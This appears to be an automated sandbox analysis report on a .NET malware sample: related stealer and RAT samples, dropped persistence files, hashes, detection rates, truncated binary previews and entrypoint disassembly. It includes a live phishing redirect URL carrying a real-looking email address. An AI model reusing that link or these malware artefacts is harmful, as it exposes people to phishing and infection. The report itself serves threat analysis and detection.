                      https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com%20https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.comGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                      • 208.95.112.1
                      WXzp6KMJ7i.exeGet hashmaliciousDCRat, Raccoon Stealer v2, RedLineBrowse
                      • 208.95.112.1
                      Payment_Copy.docx.vbsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • 208.95.112.1
                      message.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      Gsk-Lux.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      RYwCwF604X.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • 208.95.112.1
                      1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • 208.95.112.1
                      W7z1Z5tra2.exeGet hashmaliciousRedLine, WSHRATBrowse
                      • 208.95.112.1
                      J1LICQ1PqV.exeGet hashmaliciousUnknownBrowse
                      • 208.95.112.1

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9adfile.exeGet hashmaliciousXFiles StealerBrowse
                      • 162.159.135.233
                      AS9Dqsivqk.exeGet hashmaliciousUnknownBrowse
                      • 162.159.135.233
                      AS9Dqsivqk.exeGet hashmaliciousUnknownBrowse
                      • 162.159.135.233
                      Invoices.scr.exeGet hashmaliciousAveMariaBrowse
                      • 162.159.135.233
                      ZuXcnAYgVp.exeGet hashmaliciousNjratBrowse
                      • 162.159.135.233
                      j6gr7r4Bj2.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      ERFrKcEtfs.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      zipsetup_(2).exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      ncYntjWJNr.exeGet hashmaliciousNjratBrowse
                      • 162.159.135.233
                      Okuru.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      ChromeNaverGameStarter_Installer.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      Dormitory_Hentai_Clicker-Final.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      WALLHACK_CRACK_Roblox_by_PREDATOR.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      FortniteHackiNJECTOR.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      Healthy_Hentai_Lifestyle_Installer.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      RYwCwF604X.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • 162.159.135.233
                      1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • 162.159.135.233
                      https://docs.google.com/presentation/d/e/2PACX-1vTikKHOuCMRAQnyuWl6bkSnoWXxMBgQaYb36E7fDJr4AK0ZL-qckfBYFvBPAnCFm1lkRHLFNf4FyxqO/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                      • 162.159.135.233
                      puttygen.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233
                      PUTTY_GEN.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                      • 162.159.135.233

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U043f#U0440#U04_4ac42222c96a57f37dedc5ce10e7eb3e3b9455a4_b0416100_2c9cf18f-2e54-4dc7-937a-fa5452ea9a01\Report.wer

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):1.3883972708288055
                      Encrypted:false
                      SSDEEP:384:9UzbY70IbZLZtcaO0opazuiFTY4IO8zGP:9UzbSbZLZtcaO1azuiFTY4IO8z
                      MD5:2AE2D62ED43C04F7A03FE78B482C9F03
                      SHA1:DF88BAEA674DFD0589F6A3198F832DE79D7B3544
                      SHA-256:57A79834FFAE7FA7E86F3978453ED96959D0B05D4E3528F2AE8A4D946A3ABF08
                      SHA-512:6A19CDFD08D6D4AC0ADF4C68D54B9F69E62F35329504152BCD909B247119DA0E6A1618CEF79D22DDF06D3BB2EC1E96438CB24FD9709233981D54525A30622760
                      Malicious:false
                      Reputation:low
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.2.6.0.6.2.0.2.0.6.3.4.0.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.2.6.0.6.2.0.2.9.5.4.0.3.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.9.c.f.1.8.f.-.2.e.5.4.-.4.d.c.7.-.9.3.7.a.-.f.a.5.4.5.2.e.a.9.a.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.0.e.2.b.5.9.-.4.a.b.8.-.4.2.f.5.-.8.6.1.1.-.2.a.d.2.9.6.0.a.c.e.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.#.U.0.4.3.f.#.U.0.4.4.0.#.U.0.4.3.e.#.U.0.4.3.2.#.U.0.4.3.5.#.U.0.4.4.0.#.U.0.4.3.0._.#.U.0.4.3.1.#.U.0.4.3.b.#.U.0.4.3.e.#.U.0.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.o.r.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.c.-.0.0.0.1.-.0.0.1.4.-.5.3.f.b.-.d.0.b.b.4.b.0.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.9.f.f.8.f.b.1.e.c.d.6.7.e.1.b.a.9.2.c.c.4.4.a.b.7.c.1.6.0.9.9.0.0.0.0.0.0.0.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER96C9.tmp.dmp

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 24 07:30:02 2023, 0x1205a4 type
                      Category:dropped
                      Size (bytes):369633
                      Entropy (8bit):3.4279932856059525
                      Encrypted:false
                      SSDEEP:3072:dnPNlMX4uEq9hMpfSLTg/NVylmIyGY1vEZV2mY4tuR:d0X4e9Tg/NVyl9ylEre4te
                      MD5:AE8B40817B4B5CB355D096541CC4DAB9
                      SHA1:0E1C37CFAFC73637D29486843BA2D5084AD38D53
                      SHA-256:55AEBFAD5D8DCA08FB7BA719826CF78F05B18E0570F29D53433B087DF8037C30
                      SHA-512:558AF7B45BF5C291BE626D0219BA313737CC6C2D188135285B8088D319CEDB0F19C92177D69F70F012B635774DBC068F469DF3C9B54139A2388B2491A5CBADC2
                      Malicious:false
                      Reputation:low
                      Preview:MDMP..a..... .......zr7e............4............)..H.......<....4......4)..hv..........`.......8...........T...........@p...3..........L4..........86..............................................................................eJ.......6......GenuineIntel............T...........2r7e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER993B.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8660
                      Entropy (8bit):3.7046692682711906
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJ4zlm6EP6YEITSUh8gmfM1PX/pDM89bQesf9ZQm:R6lXJ006s6YEcSUh8gmfkPDQdfJ
                      MD5:6A5857F2728E6D054266FC530F5D779D
                      SHA1:4BC03A24684E8E7ED81C7FF98AE2C7997524C649
                      SHA-256:C7F7970C27856E78593717CC95BCF41B41814CF372D0F4CE2AFFC65C487DD6DB
                      SHA-512:031ECF74655C7BA80CF6CD8F1349167E4E687021B19726B95DBCB77879401595256FF195B47CE20278F62C9A21C2C326F66E64D8AADD7C9D14F3505BB826898C
                      Malicious:false
                      Reputation:low
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.2.0.<./.P.i.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER996B.tmp.xml

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5050
                      Entropy (8bit):4.558302301004493
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsHJg77aI9laWpW8VYbPYm8M4Jbm6FA+q8vdmuDL0QB+poOpCd:uIjfpI7Pb7VSSJajKMGAQB+pxpCd
                      MD5:66F3526BDE1734C7088FEE6724501157
                      SHA1:195EBA5DA62D4E8082F8C0A9D8CAAFD7EE5EAB6A
                      SHA-256:8AF80B06960CFD923F38494B6F0B3EFE5A5DD0327FD9777177F1F51433BDEEE1
                      SHA-512:9EB5BEA9977A29B277F565CD60B40CBA931A332053074755B39525233E63A49CB1B8F8E7E1D5CDD05DB65ADAF0E6D0A2C0A06E76F4177DB62962B501B03A5C1A
                      Malicious:false
                      Reputation:low
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="30152" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):654
                      Entropy (8bit):5.380476433908377
                      Encrypted:false
                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                      Malicious:false
                      Reputation:low
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr

                      Download File
                      Process:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.&e............................>.... ........@.. ....................... ..................................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......$....;......3...L...............................................0..2........o......,..r...p(....-.+..(f....+..(f.......s....*...0..`.........(.....o...........+@..........ba...+%.j ....n_ ....n3...b ....a.+...b...X...2....X.......i2..*.0........... Q...X..(...... K...Y...r...po.......a....Z..[....Xj.o....&...........o....&..(.... h.-}a.dY......o....&..(.....Y /j..a.....j.o....&.............o....&...+.........a....X......i2.(.....o....*.....(....*..(....*.s.........s

                      C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr

                      Download File
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.&e............................>.... ........@.. ....................... ..................................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......$....;......3...L...............................................0..2........o......,..r...p(....-.+..(f....+..(f.......s....*...0..`.........(.....o...........+@..........ba...+%.j ....n_ ....n3...b ....a.+...b...X...2....X.......i2..*.0........... Q...X..(...... K...Y...r...po.......a....Z..[....Xj.o....&...........o....&..(.... h.-}a.dY......o....&..(.....Y /j..a.....j.o....&.............o....&...+.........a....X......i2.(.....o....*.....(....*..(....*.s.........s

                      C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr

                      Download File
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):283648
                      Entropy (8bit):7.181935920659255
                      Encrypted:false
                      SSDEEP:3072:OwQkOvDco3kuRcsAsQsj7uOi2VmeNDayrklOc5sccTwI/IXP6rXd1ahlTkflY70o:cLVkdsQQ7rmsaJOC0j/IXcjahlelSfq
                      MD5:D88092AABD3AF3BA4EF626C31962626E
                      SHA1:95235B832C708DBF13BD7697DE37C81EF70AB2B5
                      SHA-256:12DCBC603C08FAAF1FBA0596EBD8BEA58713F313540730109957514747BE1BAC
                      SHA-512:57D7FA482C31EE81895F57D2309941D3D8A637E93EDE69356A9B2A9AD61D334F2232081E828D81F0DF33E91F3A865E4252C024A84FABB3FC7B8A752B0880FEFF
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 39%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2e.................R..........*.... ........@.. ....................................@.................................06..(....@.......................`.......................................................@...............d..H............text....P... ...................... ..`.vmp0....{..........................`..`.vmp1....=.......>..................`..`.rsrc........@.......B..............@..@.reloc.......`.......R..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:false
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr

                      Download File
                      Process:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.&e............................>.... ........@.. ....................... ..................................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......$....;......3...L...............................................0..2........o......,..r...p(....-.+..(f....+..(f.......s....*...0..`.........(.....o...........+@..........ba...+%.j ....n_ ....n3...b ....a.+...b...X...2....X.......i2..*.0........... Q...X..(...... K...Y...r...po.......a....Z..[....Xj.o....&...........o....&..(.... h.-}a.dY......o....&..(.....Y /j..a.....j.o....&.............o....&...+.........a....X......i2.(.....o....*.....(....*..(....*.s.........s

                      C:\Windows\appcompat\Programs\Amcache.hve

                      Download File
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1835008
                      Entropy (8bit):4.422436068492893
                      Encrypted:false
                      SSDEEP:6144:wSvfpi6ceLP/9skLmb0OTRWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:bvloTRW+EZMM6DFy803w
                      MD5:4F50CDF9251EF24E863508B5250C8253
                      SHA1:21B6342BFB3136DD8AC692488AB21F5D70DCD538
                      SHA-256:3CE1F20C8873264A261152260A5FEDFFD19A0721EBCEAE33A9F208D4C50CFFC2
                      SHA-512:DA065AAA77B5DF78663E3BE2C9E9687FA8A0F90E991A2838172A379ADF97BDCE85F4064D44DD626E49185AC81AB8AFB9A5CAE5CD4371EA8069F33637769A132C
                      Malicious:false
                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..m.K...............................................................................................................................................................................................................................................................................................................................................sn{.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.181935920659255
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      • Win32 Executable (generic) a (10002005/4) 49.96%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File size:283'648 bytes
                      MD5:d88092aabd3af3ba4ef626c31962626e
                      SHA1:95235b832c708dbf13bd7697de37c81ef70ab2b5
                      SHA256:12dcbc603c08faaf1fba0596ebd8bea58713f313540730109957514747be1bac
                      SHA512:57d7fa482c31ee81895f57d2309941d3d8a637e93ede69356a9b2a9ad61d334f2232081e828d81f0df33e91f3a865e4252c024a84fabb3fc7b8a752b0880feff
                      SSDEEP:3072:OwQkOvDco3kuRcsAsQsj7uOi2VmeNDayrklOc5sccTwI/IXP6rXd1ahlTkflY70o:cLVkdsQQ7rmsaJOC0j/IXcjahlelSfq
                      TLSH:8754BE357FFC4406C6D907B890E750A487F1B221B497E7E62407BBEA7A533E18D1A24B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2e.................R..........*.... ........@.. ....................................@................................

                      File Icon

                      Icon Hash:25627a1c0e263200

                      Static PE Info

                      General

                      Entrypoint:0x43032a
                      Entrypoint Section:.vmp1
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6532C3AB [Fri Oct 20 18:15:07 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00434000h]
                      cmp eax, dword ptr [eax+eax]
                      add byte ptr [eax], al
                      cdq
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      cdq
                      add eax, dword ptr [eax]
                      mov byte ptr [ebx], bh
                      add dword ptr [eax], eax
                      add byte ptr [eax], al
                      cdq
                      lds eax, fword ptr [eax]
                      add byte ptr [edx], cl
                      xor eax, 0000B31Bh
                      add byte ptr [eax], al
                      add bl, byte ptr [ebx]
                      cmp eax, dword ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [ecx-55h], ch
                      aaa
                      add byte ptr [ecx+20000000h], bl
                      mov bl, 4Eh
                      add byte ptr [eax], al
                      add dword ptr [esi], edx
                      lahf
                      cmp esp, dword ptr [esi+ebx+05h]
                      add byte ptr [004E991Fh], al
                      add byte ptr [ecx], al
                      push ss
                      cmc
                      mov byte ptr [03038099h], al
                      add bl, dh
                      inc eax
                      jnp 00007F0C2587206Dh
                      add al, byte ptr [eax]
                      add byte ptr [eax], al
                      mov bl, 69h
                      push ds
                      add eax, 2DCCC800h
                      add byte ptr [ebx+00000004h], dh
                      cmp eax, dword ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [ecx+00000000h], bl
                      sbb esi, dword ptr [ebx+0A000093h]
                      and byte ptr [ebx], bh
                      aam 00h
                      add byte ptr [esi], al
                      xor eax, 2200002Ah
                      add byte ptr [eax], al
                      sbb ebx, dword ptr [ecx+0A000093h]
                      and byte ptr [ebx+0A00009Ah], dh
                      xor eax, 00004E3Bh
                      add dword ptr [esi], edx
                      inc edi
                      fstp qword ptr [ecx+000314BCh]
                      add eax, 004EB31Fh
                      add byte ptr [ecx], al
                      push ss
                      bound esp, dword ptr [edx]
                      mov bl, C7h
                      adc eax, 57F30003h
                      add bl, byte ptr [ecx+00000001h]
                      cmp esp, dword ptr [ecx+3Ch]
                      add eax, dword ptr [eax]
                      adc byte ptr [ebx], bh
